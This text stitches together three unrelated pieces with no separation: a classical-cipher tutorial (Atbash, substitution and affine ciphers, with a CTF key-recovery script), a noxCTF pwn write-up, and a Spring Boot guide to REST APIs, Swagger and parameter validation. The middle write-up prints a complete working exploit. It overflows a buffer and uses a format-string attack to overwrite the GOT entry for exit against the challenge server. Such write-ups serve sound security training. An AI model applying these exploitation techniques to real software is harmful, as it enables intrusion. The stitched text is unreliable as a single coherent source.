The Atbash cipher can in fact be viewed as a special case of the simple substitution cipher introduced below: it uses the last letter of the alphabet for the first letter, the second-to-last letter for the second letter, and so on. Over the Roman alphabet it looks like this:

```
Plaintext:  A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Ciphertext: Z Y X W V U T S R Q P O N M L K J I H G F E D C B A
```

An example:

```
Plaintext:  the quick brown fox jumps over the lazy dog
Ciphertext: gsv jfrxp yildm ulc qfnkh levi gsv ozab wlt
```

### Breaking

Its key space is obviously tiny; and when the ciphertext is long enough, frequency analysis can still be applied.

### Tools

- http://www.practicalcryptography.com/ciphers/classical-era/atbash-cipher/

## Simple Substitution Cipher

### Principle

A simple substitution cipher encrypts by replacing each plaintext letter with a unique, distinct letter. The difference from the Caesar cipher is that its cipher alphabet is not a simple shift but a complete scramble, which also makes it harder to break than the Caesar cipher.

For example:

```
Plaintext alphabet: abcdefghijklmnopqrstuvwxyz
Key alphabet:       phqgiumeaylnofdxjkrcvstzwb
```

a corresponds to p, b corresponds to h, and so on.

```
Plaintext:  the quick brown fox jumps over the lazy dog
Ciphertext: cei jvaql hkdtf udz yvoxr dsik cei npbw gdm
```

For decryption, we generally need to know the mapping rule for every letter in order to decrypt properly.

### Breaking

Since this scheme has $26!$ possible keys, it is essentially impossible to use a brute-force approach. We therefore generally use frequency analysis.

### Tools

- http://quipqiup.com/

## Affine Cipher

### Principle

The affine cipher's encryption function is $E(x)=(ax+b)\pmod m$, where

- $x$ is the number the plaintext maps to under some encoding
- $a$ and $m$ are coprime
- $m$ is the number of letters in the encoding system.

The decryption function is $D(x)=a^{-1}(x-b)\pmod m$, where $a^{-1}$ is the multiplicative inverse of $a$ in the group $\mathbb{Z}_{m}$.

Below we take the function $E(x) = (5x + 8) \bmod 26$ as an example, encrypting the string `AFFINE CIPHER` and directly using the 26-letter alphabet as the encoding system:

| Plaintext | A | F | F | I | N | E | C | I | P | H | E | R |
| --------- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| x | 0 | 5 | 5 | 8 | 13 | 4 | 2 | 8 | 15 | 7 | 4 | 17 |
| $y=5x+8$ | 8 | 33 | 33 | 48 | 73 | 28 | 18 | 48 | 83 | 43 | 28 | 93 |
| $y\mod26$ | 8 | 7 | 7 | 22 | 21 | 2 | 18 | 22 | 5 | 17 | 2 | 15 |
| Ciphertext | I | H | H | W | V | C | S | W | F | R | C | P |

The corresponding encryption result is `IHHWVCSWFRCP`.

For decryption, the legitimate recipient knows $a$ and $b$, and can compute $a^{-1} = 21$, so the decryption function is $D(x)=21(x-8)\pmod {26}$. Decryption proceeds as follows:

| Ciphertext | I | H | H | W | V | C | S | W | F | R | C | P |
| ----------- | :--- | :--- | --- | --- | --- | ---- | --- | --- | --- | --- | ---- | --- |
| $y$ | 8 | 7 | 7 | 22 | 21 | 2 | 18 | 22 | 5 | 17 | 2 | 15 |
| $x=21(y-8)$ | 0 | -21 | -21 | 294 | 273 | -126 | 210 | 294 | -63 | 189 | -126 | 147 |
| $x\mod26$ | 0 | 5 | 5 | 8 | 13 | 4 | 2 | 8 | 15 | 7 | 4 | 17 |
| Plaintext | A | F | F | I | N | E | C | I | P | H | E | R |

As can be seen, its defining characteristic is that it operates on just the 26 English letters.

### Breaking

First, observe that the affine cipher maps any two distinct letters to distinct ciphertext letters, so it shares the most general property of this family: when the ciphertext is long enough, we can use frequency analysis to solve it.

Second, we can consider how to attack this cipher directly. It is easy to see that when $a=1$
, the affine cipher is simply the Caesar cipher. In general, when we use the affine cipher the character set is the alphabet, usually just 26 letters, and the number of positive integers not greater than 26 and coprime to 26 is

$$
\phi(26)=\phi(2) \times \phi(13) = 12
$$

Counting the possible offsets $b$, the total size of the possible key space is

$$
12 \times 26 = 312
$$

Generally speaking, to attack this kind of cipher we need at least some known plaintext. A brief analysis follows.

The cipher is controlled by two parameters; if we know either one of them, we can very easily and quickly enumerate the other to get the answer.

But suppose we already know the alphabet in use, assumed here to be the 26 letters; then there is another way to decrypt: we only need to know two encrypted letters $y_1,y_2$. We then know

$$
y_1=(ax_1+b)\pmod{26} \\
y_2=(ax_2+b)\pmod{26}
$$

Subtracting the two equations gives

$$
y_1-y_2=a(x_1-x_2)\pmod{26}
$$

Here $y_1,y_2$ are known. If we know the two distinct plaintext characters $x_1$ and $x_2$ corresponding to the ciphertext, we can very easily obtain $a$, and from that $b$.

### Example

Here we take super_express from TWCTF 2016 as an example. A quick look at the provided source:

```python
import sys
key = '****CENSORED***************'
flag = 'TWCTF{*******CENSORED********}'

if len(key) % 2 == 1:
    print("Key Length Error")
    sys.exit(1)

n = len(key) / 2
encrypted = ''
for c in flag:
    c = ord(c)
    for a, b in zip(key[0:n], key[n:2*n]):
        c = (ord(a) * c + ord(b)) % 251
    encrypted += '%02x' % c

print encrypted
```

Although each character of the flag is encrypted $n$ times, a careful analysis shows that

$$
\begin{align*}
c_1&=a_1c+b_1 \\
c_2&=a_2c_1+b_2 \\
&=a_1a_2c+a_2b_1+b_2 \\
&=kc+d
\end{align*}
$$

Following the derivation on the second line, $c_n$ also has this form and can be viewed as $c_n=xc+y$. Moreover, we know the key never changes, so this is in fact an affine cipher.

In addition, the challenge also provides the ciphertext along with the plaintext corresponding to part of it, so we can easily mount a known-plaintext attack, using the following code:

```python
import gmpy

key = '****CENSORED****************'
flag = 'TWCTF{*******CENSORED********}'

f = open('encrypted', 'r')
data = f.read().strip('\n')
encrypted = [int(data[i:i + 2], 16) for i in range(0, len(data), 2)]
plaindelta = ord(flag[1]) - ord(flag[0])
cipherdalte = encrypted[1] - encrypted[0]
a = gmpy.invert(plaindelta, 251) * cipherdalte % 251
b = (encrypted[0] - a * ord(flag[0])) % 251
a_inv = gmpy.invert(a, 251)
result = ""
for c in encrypted:
    result += chr((c - b) * a_inv % 251)
print result
```

The result:

```shell
➜  TWCTF2016-super_express git:(master) ✗ python exploit.py
TWCTF{Faster_Than_Shinkansen!}
```
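A minimal Python sketch of the affine formulas above, over the 26-letter alphabet (so $m = 26$), reproducing the `AFFINE CIPHER` example:

```python
from math import gcd

M = 26  # alphabet size

def affine(text, a, b, decrypt=False):
    assert gcd(a, M) == 1        # a must be invertible modulo 26
    a_inv = pow(a, -1, M)        # modular inverse (Python 3.8+)
    out = []
    for ch in text.upper():
        if not ch.isalpha():
            out.append(ch)       # leave spaces/punctuation untouched
            continue
        x = ord(ch) - ord('A')
        y = (a_inv * (x - b)) % M if decrypt else (a * x + b) % M
        out.append(chr(y + ord('A')))
    return ''.join(out)

print(affine("AFFINE CIPHER", 5, 8))                # IHHWVC SWFRCP
print(affine("IHHWVC SWFRCP", 5, 8, decrypt=True))  # AFFINE CIPHER
```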
# Writeup - noxCTF - The Name Calculator ("Pwn" Category)

## Instructions:

You can calculate almost everything, why not calculate names?

nc chal.noxale.com 5678

*[A binary file was attached as well]*

## Solution:

We connect to the supplied address and receive the following output:

```console
$ nc chal.noxale.com 5678
What is your name?
```

We can then enter text, and the response is:

```console
$ nc chal.noxale.com 5678
What is your name?
Fake Name
I've heard better
```

Let's take a look at the assembly:

![](images/image004.png)

The program reads up to 0x20 (32) bytes of the user input into the `input` buffer, then compares a different buffer (`magic_number`) to a magic value (0x6A4B825) and if they are equal, jumps to the `secretFunc`. Otherwise, we get the standard output ("I've heard better").

What's the relation between `input` and `magic_number`?

```
input= byte ptr -2Ch
magic_number= dword ptr -10h
var_C= dword ptr -0Ch
argc= dword ptr 8
argv= dword ptr 0Ch
envp= dword ptr 10h
```

So `input` is 0x2C - 0x10 = 28 bytes long, and `magic_number` is another 4 bytes long - exactly enough to easily overflow `input` when reading the input from the user.

Therefore, our exploit so far will be:

```python
from pwn import *

MAGIC_VALUE = 0x6A4B825

p = process("./TheNameCalculator")
p.recvuntil("name?")
p.send("A" * 28 + p32(MAGIC_VALUE))
p.interactive()
```

And running it produces:

```console
root@kali:/media/sf_CTFs/noxale/name_calc# python exploit.py
[+] Starting local process './TheNameCalculator': pid 30144
[*] Switching to interactive mode

Say that again please
$
```

At this point, we can enter another string. The output, for example, will be:

```console
Say that again please
$ Fake Name
Your name was encrypted using the best encryption in the world
This is your new name:
\x15sS\x16x\x04I:
[*] Process './TheNameCalculator' stopped with exit code 0 (pid 30144)
[*] Got EOF while reading in interactive
```

The next step would be to analyze `secretFunc`. The function starts with the initialization of some local variables:

![](images/image005.png)

It then moves on to zero the `input` buffer:

![](images/image006.png)

After that, it performs some bookkeeping related to the stack canary and the old return address, meaning that it would be hard to hijack the flow using a buffer overflow or by overriding the return address of the current function.

It reads 27 bytes into the local `input` buffer, and then adds the NULL terminator. Then comes the interesting part:

![](images/image007.png)

It loops over the input, encrypts it, and outputs it to the user as the "new name". A closer look shows that the new name is printed using `printf`, where the format string is `input` itself - exposing the program to a format string vulnerability.

We control the input, but the input is encrypted before being passed to `printf`. Therefore, we will have to supply an input which only after being "encrypted" will look like a format string. This is possible, since the "encryption" is achieved using XORs between the input and the local `magic_number` variable initialized earlier.
The encryption algorithm can be translated to the following:

```c
int magic_number = 0x5F7B4153;
char* pInputPtr = pInput;

while (&pInput[bytes_read - 4] != pInputPtr)
{
    *pInputPtr ^= magic_number;
    pInputPtr++;
}
```

Translated to Python:

```python
MAGIC_XOR = 0x5F7B4153

def encrypt(plaintext):
    b = bytearray(plaintext)
    magic = p32(MAGIC_XOR)
    for i in xrange(len(b) - 4):
        for j in xrange(len(magic)):
            b[i + j] ^= ord(magic[j])
    return b
```

Since the encryption is achieved via XOR, it works both ways - we can encrypt our format string with this algorithm before we send it, and the encryption performed in the program will bring it back to its original form.

The next step would be to decide what we want to do with the format string vulnerability. That "what?" is pretty obvious from exploring the assembly - we have a `superSecretFunc` that outputs the flag, and we want to jump to it:

![](images/image008.png)

The "how?" is a bit more complicated, given the stack canary and return address verification implemented in `secretFunc`. We could try to override the `fflush` pointer, which is called right after our vulnerable `printf`, but `fflush` is also used to output the flag in `superSecretFunc`. Instead, we will hijack `exit`, which is called from `main` after `secretFunc` returns:

![](images/image009.png)

We can use pwntools to get the address of the GOT entry for `exit`:

```python
PROC_NAME = "./TheNameCalculator"

e = ELF(PROC_NAME)
got_exit_addr = e.got['exit']
log.info("got_exit_addr = {}".format(hex(got_exit_addr)))

# Returns: got_exit_addr = 0x804a024
```

And in order to find the format offset, we use pwntools as well:

```python
# This function is used to leak the stack using the format string
# vulnerability.
def send_payload(payload, proc = None):
    log.info("payload = {} (len = {})".format(repr(payload), len(payload)))
    if proc is None:
        proc = process(PROC_NAME)
    proc.recvuntil("name?")
    proc.send("X" * 28 + p32(MAGIC_VALUE))
    proc.recvuntil("again")
    enc_payload = encrypt(payload)
    proc.send(enc_payload)
    proc.recvuntil("name: ")
    ret = proc.recvall()
    log.info("return = {}".format(repr(ret)))
    return ret

# Since the pwntools FmtStr class uses a marker length of 20, and our input
# is limited to 27 bytes, we need to shorten the marker to make room for
# the rest of the payload. This option isn't provided by pwntools (yet),
# so we just override the appropriate function using inheritance.
class FmtStrEx(FmtStr):
    def find_offset(self):
        marker_len = 8
        marker = cyclic(marker_len)
        for off in range(1,1000):
            leak = self.leak_stack(off, marker)
            leak = pack(leak)

            pad = cyclic_find(leak)
            if pad >= 0 and pad < marker_len:
                return off, pad
        else:
            log.error("Could not find offset to format string on stack")
            return None, None

f = FmtStrEx(execute_fmt=send_payload)

# Prints: [*] Found format string offset: 12
```

So we want to write to address 0x804a024 (the GOT `exit` address) the value of the `superSecretFunc` entry point (0x08048596). Since `exit` wasn't called yet, 0x804a024 still contains its original value which is 0x8048476 (a pointer to the lazy binding logic):

```
root@kali:/media/sf_CTFs/noxale/name_calc# gdb ./TheNameCalculator
[...]
Reading symbols from ./TheNameCalculator...(no debugging symbols found)...done.
>>> p/x *0x0804A024
$1 = 0x8048476
>>> disas $1,+10
Dump of assembler code from 0x8048476 to 0x8048480:
   0x08048476 <exit@plt+6>:     push   0x30
   0x0804847b <exit@plt+11>:    jmp    0x8048400
End of assembler dump.
>>>
```

(You can read a bit more about the GOT's lazy binding [here](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html))

Therefore, we just need to override the first WORD - the second word (0x0804) already contains the value we want.

The final part of the exploit therefore is:

```python
superSecretFunc_addr = e.symbols['superSecretFunc']
log.info("superSecretFunc = {}".format(hex(superSecretFunc_addr)))

exploit = bytearray(p32(got_exit_addr))
exploit += "%{}x".format((superSecretFunc_addr & 0xFFFF) - len(exploit)) + "%{}$hn".format(f.offset)
log.info("exploit = {} (len = {})".format(exploit, len(exploit)))

print send_payload(exploit, remote('chal.noxale.com', 5678))
```

The flag: **noxCTF{M1nd_7he_Input}**

The complete exploit:

```python
from pwn import *

PROC_NAME = "./TheNameCalculator"
MAGIC_VALUE = 0x6A4B825
MAGIC_XOR = 0x5F7B4153

# Since the pwntools FmtStr class uses a marker length of 20, and our input
# is limited to 27 bytes, we need to shorten the marker to make room for
# the rest of the payload. This option isn't provided by pwntools (yet),
# so we just override the appropriate function using inheritance.
class FmtStrEx(FmtStr):
    def find_offset(self):
        marker_len = 8
        marker = cyclic(marker_len)
        for off in range(1,1000):
            leak = self.leak_stack(off, marker)
            leak = pack(leak)

            pad = cyclic_find(leak)
            if pad >= 0 and pad < marker_len:
                return off, pad
        else:
            log.error("Could not find offset to format string on stack")
            return None, None

def encrypt(plaintext):
    b = bytearray(plaintext)
    magic = p32(MAGIC_XOR)
    for i in xrange(len(b) - 4):
        for j in xrange(len(magic)):
            b[i + j] ^= ord(magic[j])
    return b

def send_payload(payload, proc = None):
    log.info("payload = {} (len = {})".format(repr(payload), len(payload)))
    if proc is None:
        proc = process(PROC_NAME)
    proc.recvuntil("name?")
    proc.send("X" * 28 + p32(MAGIC_VALUE))
    proc.recvuntil("again")
    enc_payload = encrypt(payload)
    proc.send(enc_payload)
    proc.recvuntil("name: ")
    ret = proc.recvall()
    log.info("return = {}".format(repr(ret)))
    return ret

e = ELF(PROC_NAME)
got_exit_addr = e.got['exit']
log.info("got_exit_addr = {}".format(hex(got_exit_addr)))

superSecretFunc_addr = e.symbols['superSecretFunc']
log.info("superSecretFunc = {}".format(hex(superSecretFunc_addr)))

f = FmtStrEx(execute_fmt=send_payload)

exploit = bytearray(p32(got_exit_addr))
exploit += "%{}x".format((superSecretFunc_addr & 0xFFFF) - len(exploit)) + "%{}$hn".format(f.offset)
log.info("exploit = {} (len = {})".format(exploit, len(exploit)))

print send_payload(exploit, remote('chal.noxale.com', 5678))
```
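One sanity check worth noting: because the "encryption" XORs the same fixed key bytes over sliding windows, applying it twice restores the original buffer - which is exactly why pre-encrypting the payload works:

```python
# XOR is self-inverse, so encrypt() is an involution
payload = b"%08x.%08x.%08x"
assert encrypt(encrypt(payload)) == bytearray(payload)
```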
# API Development

---

## Building a RESTful API with Unit Tests

Recall the @Controller, @RestController and @RequestMapping annotations used in the getting-started example.

- @Controller: applied to a class to create an object that handles HTTP requests
- @RestController: added in Spring 4. Previously, returning JSON from a @Controller required @ResponseBody as well; using @RestController instead of @Controller removes the need for @ResponseBody and returns JSON by default
- @RequestMapping: configures URL mappings. Nowadays mappings are more often defined with the HTTP-method-specific annotations such as GetMapping, PostMapping, DeleteMapping, PutMapping, etc.

Below we use Spring MVC to implement a set of RESTful APIs operating on a User object, explaining with comments how Spring MVC maps HTTP requests, how parameters are passed, and how unit tests are written.

The RESTful API is designed as follows:

| HTTP method | URL | Description |
| - | - | - |
| GET | /users | query the user list |
| POST | /users | create a user |
| GET | /users/id | query a user by id |
| PUT | /users/id | update a user by id |
| DELETE | /users/id | delete a user by id |

Define the User entity:

```java
@Data
public class User {

    private Long id;
    private String name;
    private Integer age;

}
```

Note: compared with hand-writing set and get methods as in the 1.x versions, the @Data annotation generates them automatically at compile time. It is provided by lombok; just add the following dependency to the pom:

```xml
<dependency>
    <groupId>org.projectlombok</groupId>
    <artifactId>lombok</artifactId>
</dependency>
```

Implement the operations on the User object:

```java
@RestController
@RequestMapping(value = "/users")     // makes all mappings below live under /users
public class UserController {

    // thread-safe Map simulating user storage
    static Map<Long, User> users = Collections.synchronizedMap(new HashMap<Long, User>());

    /**
     * Handles GET requests to "/users/", returning the user list
     */
    @GetMapping("/")
    public List<User> getUserList() {
        // query conditions or paging information could also be passed in via @RequestParam
        List<User> r = new ArrayList<User>(users.values());
        return r;
    }

    /**
     * Handles POST requests to "/users/", creating a User
     */
    @PostMapping("/")
    public String postUser(@RequestBody User user) {
        // @RequestBody binds data uploaded in the HTTP request with content type application/json
        users.put(user.getId(), user);
        return "success";
    }

    /**
     * Handles GET requests to "/users/{id}", returning the User with the id from the URL
     */
    @GetMapping("/{id}")
    public User getUser(@PathVariable Long id) {
        // the id in the URL is bound to the method parameter via @PathVariable
        return users.get(id);
    }

    /**
     * Handles PUT requests to "/users/{id}", updating the User
     */
    @PutMapping("/{id}")
    public String putUser(@PathVariable Long id, @RequestBody User user) {
        User u = users.get(id);
        u.setName(user.getName());
        u.setAge(user.getAge());
        users.put(id, u);
        return "success";
    }

    /**
     * Handles DELETE requests to "/users/{id}", deleting the User
     */
    @DeleteMapping("/{id}")
    public String deleteUser(@PathVariable Long id) {
        users.remove(id);
        return "success";
    }

}
```

Compared with the 1.x versions, the more specific `@GetMapping`, `@PostMapping` and friends replace the old `@RequestMapping` annotation, and `@RequestBody` replaces `@ModelAttribute` for parameter binding.

At this point, just by pulling in the web module (with no other configuration), we can use Spring MVC's features to finish the RESTful API for the User object, together with its unit tests, in very concise code. Along the way we met Spring MVC's most commonly used core annotations - @RestController and @RequestMapping - plus the parameter-binding annotations @PathVariable, @RequestBody, etc.

---

## Using Swagger

With the rise of front-end/back-end separation and microservice architectures, we build RESTful API projects with Spring Boot more and more often. A single RESTful API may serve several developers or teams: iOS, Android, web, and even other back-end services. To cut down day-to-day communication overhead with those teams, the traditional approach is to write a RESTful API document recording every interface detail - which has the following problems:

- With many interfaces and complex details (different HTTP methods, headers, request bodies, ...), producing this document at high quality is itself hard work, and downstream complaints never stop.
- As time goes on, every interface change must be synchronized into the document; since document and code live in two different media, inconsistencies creep in easily unless strict management is in place.

To solve these problems we can use Swagger2. It integrates easily into Spring Boot, and together with Spring MVC it organizes a powerful RESTful API document. It reduces the documentation effort, and since the descriptions live inside the implementation code, maintaining the document and changing the code become one task: the documentation can be updated right where the logic changes. Swagger2 also provides a powerful page for testing and debugging each RESTful API.

First we need a Spring Boot project implementing a RESTful API - the one above will do.

To integrate Swagger2, add the swagger-spring-boot-starter dependency:

- https://github.com/SpringForAll/spring-boot-starter-swagger

Add the dependency to pom.xml:

```xml
<dependency>
    <groupId>com.spring4all</groupId>
    <artifactId>swagger-spring-boot-starter</artifactId>
    <version>1.9.0.RELEASE</version>
</dependency>
```

Add the @EnableSwagger2Doc annotation to the application main class:

```java
@EnableSwagger2Doc
@SpringBootApplication
public class testApplication {

    public static void main(String[] args) {
        SpringApplication.run(testApplication.class, args);
    }

}
```

Configure the document in application.properties, for example:

```conf
swagger.title=spring-boot-starter-swagger
swagger.description=Starter for swagger 2.x
swagger.version=1.4.0.RELEASE
swagger.license=Apache License, Version 2.0
swagger.licenseUrl=https://www.apache.org/licenses/LICENSE-2.0.html
swagger.termsOfServiceUrl=https://github.com/dyc87112/spring-boot-starter-swagger
swagger.contact.name=test
swagger.contact.url=http://blog.test.com
swagger.contact.email=test@qq.com
swagger.base-package=com.test
swagger.base-path=/**
```

The parameters mean:

- swagger.title: title
- swagger.description: description
- swagger.version: version
- swagger.license: license
- swagger.licenseUrl: license URL
- swagger.termsOfServiceUrl: terms-of-service URL
- swagger.contact.name: maintainer
- swagger.contact.url: maintainer URL
- swagger.contact.email: maintainer email
- swagger.base-package: base package scanned by swagger; default: scan everything
- swagger.base-path: base URL patterns to handle; default: /**

Start the application and visit: http://localhost:8080/swagger-ui.html

If startup fails, check the following links; most cases are Spring Boot version issues:

- https://github.com/springfox/springfox/issues/3791
- https://gitee.com/didispace/SpringBoot-Learning/tree/master/2.x/chapter2-2
- https://cloud.tencent.com/developer/article/1815129
- https://www.cnblogs.com/rainbow70626/p/15680184.html

**Adding documentation content**

After integrating Swagger, the page at http://localhost:8080/swagger-ui.html still describes each interface in English or with names derived from the code. That is not user friendly, so we add our own descriptions to enrich the document. As shown below, the @Api and @ApiOperation annotations describe the APIs, while @ApiImplicitParam, @ApiModel and @ApiModelProperty describe the parameters.

```java
@Api(tags = "User management")
@RestController
@RequestMapping(value = "/users")     // makes all mappings below live under /users
public class UserController {

    // thread-safe Map simulating user storage
    static Map<Long, User> users = Collections.synchronizedMap(new HashMap<>());

    @GetMapping("/")
    @ApiOperation(value = "Get the user list")
    public List<User> getUserList() {
        List<User> r = new ArrayList<>(users.values());
        return r;
    }

    @PostMapping("/")
    @ApiOperation(value = "Create a user", notes = "Create a user from a User object")
    public String postUser(@RequestBody User user) {
        users.put(user.getId(), user);
        return "success";
    }

    @GetMapping("/{id}")
    @ApiOperation(value = "Get user details", notes = "Get the details of the user with the id in the URL")
    public User getUser(@PathVariable Long id) {
        return users.get(id);
    }

    @PutMapping("/{id}")
    @ApiImplicitParam(paramType = "path", dataType = "Long", name = "id", value = "user id", required = true, example = "1")
    @ApiOperation(value = "Update user details", notes = "Select the user to update by the id in the URL and update it with the uploaded user data")
    public String putUser(@PathVariable Long id, @RequestBody User user) {
        User u = users.get(id);
        u.setName(user.getName());
        u.setAge(user.getAge());
        users.put(id, u);
        return "success";
    }

    @DeleteMapping("/{id}")
    @ApiOperation(value = "Delete a user", notes = "Select the user to delete by the id in the URL")
    public String deleteUser(@PathVariable Long id) {
        users.remove(id);
        return "success";
    }

}

@Data
@ApiModel(description = "User entity")
public class User {

    @ApiModelProperty("user id")
    private Long id;

    @ApiModelProperty("user name")
    private String name;

    @ApiModelProperty("user age")
    private Integer age;

}
```

After adding the code above, restart the Spring Boot application and visit http://localhost:8080/swagger-ui.html to see the document with the friendly descriptions.

---

## Request Parameter Validation with JSR-303

Validating request parameters is a scenario where beginners often slip up or leave a lot of room for improvement. The common problems are:

- Relying only on the front-end framework for validation and skipping server-side checks. This often happens when the same people develop both ends: normal use of the application works fine, but non-standard access is forgotten. For example, bypassing the front end and forging client requests goes straight past all the limits preset in the front end and hits the data-access interfaces directly, leaving the system with security risks.
- 
Heavy use of nested if/else statements, which makes the validation logic obscure and hard to maintain long term.

Given these problems, server-side developers should always validate request parameters on the server to keep data safe and the system stable. At the same time, the validation code should be elegant - easy to read and easy to maintain.

**What is JSR-303?**

JSR is short for Java Specification Requests: a formal request to the JCP (Java Community Process) to add a new standardized technical specification. Anyone can submit a JSR to add new APIs and services to the Java platform; JSRs have become an important standard in the Java world.

**What does JSR-303 define?**

JSR-303 is a sub-specification of Java EE 6 called Bean Validation. Hibernate Validator is the reference implementation of Bean Validation: it implements all built-in constraints of the JSR-303 specification plus some additional ones, for example:

- @AssertFalse: the annotated element must be false
- @AssertTrue: the annotated element must be true
- @DecimalMax: the annotated element must be a number no greater than the given maximum
- @DecimalMin: the annotated element must be a number no less than the given minimum

and so on.

Under the JSR-303 standard, these annotations let us declare the validation of request parameters elegantly.

**Hands-on parameter validation**

Take any Spring Boot 2.x project providing a RESTful API as the base.

Start with a simple example: a field must not be null. Add the @NotNull annotation to the fields to validate:

```java
@Data
@ApiModel(description = "User entity")
public class User {

    @ApiModelProperty("user id")
    private Long id;

    @NotNull
    @ApiModelProperty("user name")
    private String name;

    @NotNull
    @ApiModelProperty("user age")
    private Integer age;

}
```

Add the @Valid annotation before the entity parameter to validate:

```java
@PostMapping("/")
@ApiOperation(value = "Create a user", notes = "Create a user from a User object")
public String postUser(@Valid @RequestBody User user) {
    users.put(user.getId(), user);
    return "success";
}
```

With that in place, start the application and send a POST request to localhost:8080/users/ whose body does not contain the age parameter.

**Trying some other validations**

Beyond the example above, we can add rules such as string length, numeric ranges, email format, etc. Some more complex constraints:

```java
@Data
@ApiModel(description = "User entity")
public class User {

    @ApiModelProperty("user id")
    private Long id;

    @NotNull
    @Size(min = 2, max = 5)
    @ApiModelProperty("user name")
    private String name;

    @NotNull
    @Max(100)
    @Min(10)
    @ApiModelProperty("user age")
    private Integer age;

    @NotNull
    @Email
    @ApiModelProperty("user email")
    private String email;

}
```

**How this shows up in the Swagger document**

Swagger itself supports JSR-303 to a degree, but the support is not complete: not every annotation is covered.

The annotations we used above can be picked up automatically. Start the project, open http://localhost:8080/swagger-ui.html, and in the Models section you can see that the name and age fields carry extra validation notes compared with the previous tutorial, while the email field shows nothing. Currently Swagger supports the following annotations: @NotNull, @Max, @Min, @Size and @Pattern. In practice, handle it case by case: rely on the native support where Swagger can generate the notes automatically, and for fields where it cannot, put the validation notes into the @ApiModelProperty description so that consumers can still see them.

**When parameter validation fails, can the error format be changed?**

Yes. The error information is assembled and returned by Spring Boot's unified exception-handling mechanism.

**Is spring-boot-starter-validation required?**

In Spring Boot 2.1, that dependency is already included in the spring-boot-starter-web dependency.

---

## Grouping Swagger Interfaces

In Spring Boot, interfaces are organized with the Controller as the first-level dimension; the relationship between a Controller and its interfaces is one-to-many, so the interfaces belonging to one module can be defined in one Controller. By default, Swagger groups interfaces by Controller. The grouping element is called a Tag in Swagger, but the relationship between Tags and interfaces is not one-to-many - it supports a richer many-to-many relationship.

**Default grouping**

First, a simple example of how Swagger organizes Tags and interfaces from Controllers by default. Define two Controllers, responsible for teacher management and student management:

```java
@RestController
@RequestMapping(value = "/teacher")
static class TeacherController {

    @GetMapping("/xxx")
    public String xxx() {
        return "xxx";
    }

}

@RestController
@RequestMapping(value = "/student")
static class StudentController {

    @ApiOperation("Get the student list")
    @GetMapping("/list")
    public String bbb() {
        return "bbb";
    }

    @ApiOperation("Get the list of teachers who teach a given student")
    @GetMapping("/his-teachers")
    public String ccc() {
        return "ccc";
    }

    @ApiOperation("Create a student")
    @PostMapping("/aaa")
    public String aaa() {
        return "aaa";
    }

}
```

After starting the application, we can see how Swagger organizes these two Controllers.

**Customizing the default group names**

Use the @Api annotation to customize the Tags:

```java
@Api(tags = "Teacher management")
@RestController
@RequestMapping(value = "/teacher")
static class TeacherController {
    // ...
}

@Api(tags = "Student management")
@RestController
@RequestMapping(value = "/student")
static class StudentController {
    // ...
}
```

After restarting the application, the grouping shows the tags defined in @Api, replacing the default teacher-controller and student-controller names.

**Merging Controller groups**

So far Tags and Controllers have been strictly one-to-one, but Swagger supports more flexible grouping! We can aggregate the interfaces of several Controllers by defining identically named Tags. For instance, we can define a "Teaching management" Tag that contains all interfaces of both teacher management and student management:

```java
@Api(tags = {"Teacher management", "Teaching management"})
@RestController
@RequestMapping(value = "/teacher")
static class TeacherController {
    // ...
}

@Api(tags = {"Student management", "Teaching management"})
@RestController
@RequestMapping(value = "/student")
static class StudentController {
    // ...
}
```

**Finer-grained interface grouping**

@Api merges a Controller's interfaces into a Tag, but what if we want to merge at the level of a single interface? Take this requirement: "Teaching management" should contain all interfaces of "Teacher management" plus only the "Get the student list" interface of "Student management" (not all of them). The approach above cannot express that. In such cases, the tags attribute of the @ApiOperation annotation defines finer-grained interface grouping; the requirement above can be written like this:

```java
@Api(tags = {"Teacher management", "Teaching management"})
@RestController
@RequestMapping(value = "/teacher")
static class TeacherController {

    @ApiOperation(value = "xxx")
    @GetMapping("/xxx")
    public String xxx() {
        return "xxx";
    }

}

@Api(tags = {"Student management"})
@RestController
@RequestMapping(value = "/student")
static class StudentController {

    @ApiOperation(value = "Get the student list", tags = "Teaching management")
    @GetMapping("/list")
    public String bbb() {
        return "bbb";
    }

    @ApiOperation("Get the list of teachers who teach a given student")
    @GetMapping("/his-teachers")
    public String ccc() {
        return "ccc";
    }

    @ApiOperation("Create a student")
    @PostMapping("/aaa")
    public String aaa() {
        return "aaa";
    }

}
```

---

## Ordering Swagger Elements

- https://blog.didispace.com/spring-boot-learning-21-2-4/

---

## Generating Static Swagger Documentation

Swagger2Markup is an open-source project on GitHub. It converts the documentation auto-generated by Swagger into several popular formats for static deployment and use: AsciiDoc, Markdown and Confluence.

- https://github.com/Swagger2Markup/swagger2markup

Prepare a web project that uses Swagger - the one above will do.

AsciiDoc documents can be generated in two ways:

**Via Java code**

Edit pom.xml to add the needed dependency and repository:

```xml
<dependencies>
    ...
    <dependency>
        <groupId>io.github.swagger2markup</groupId>
        <artifactId>swagger2markup</artifactId>
        <version>1.3.3</version>
        <scope>test</scope>
    </dependency>
</dependencies>

<repositories>
    <repository>
        <snapshots>
            <enabled>false</enabled>
        </snapshots>
        <id>jcenter-releases</id>
        <name>jcenter</name>
        <url>https://jcenter.bintray.com</url>
    </repository>
</repositories>
```

Since this tool is mainly used ad hoc, the scope is set to test, so the dependency is not packaged into the normal runtime.

Write a unit test that runs the document generation:

```java
@RunWith(SpringRunner.class)
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.DEFINED_PORT)
public class DemoApplicationTests {

    @Test
    public void generateAsciiDocs() throws Exception {
        URL remoteSwaggerFile = new URL("http://localhost:8080/v2/api-docs");
        Path outputDirectory = Paths.get("src/docs/asciidoc/generated");

        // output in AsciiDoc format
        Swagger2MarkupConfig config = new Swagger2MarkupConfigBuilder()
                .withMarkupLanguage(MarkupLanguage.ASCIIDOC)
                .build();

        Swagger2MarkupConverter.from(remoteSwaggerFile)
                .withConfig(config)
                .build()
                .toFolder(outputDirectory);
    }

}
```

The code is simple; a few key points:

- MarkupLanguage.ASCIIDOC: the final output format. Besides ASCIIDOC there are MARKDOWN and CONFLUENCE_MARKUP, which define the other formats.
- from(remoteSwaggerFile): the source configuration for generating the static documents. It can be a URL as here, a Swagger-conformant String, or a stream read from a file. For the current Swagger project we just hit the local Swagger endpoint; for an externally obtained Swagger spec file, use the string or file-reading approach.
- toFolder(outputDirectory): the output directory for the generated files.

